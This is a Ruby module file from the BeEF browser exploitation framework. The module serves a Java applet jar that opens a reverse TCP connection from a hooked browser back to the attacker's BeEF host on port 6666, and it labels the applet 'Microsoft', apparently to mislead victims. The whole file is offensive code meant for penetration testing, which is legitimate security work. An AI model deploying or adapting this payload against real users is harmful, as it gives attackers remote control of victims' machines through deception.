# # Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Java_payload < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar') end def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host return [ {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'}, {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host}, {'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'}, {'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)}, {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'} ] end def post_execute save({'result' => @datastore['result']}) end end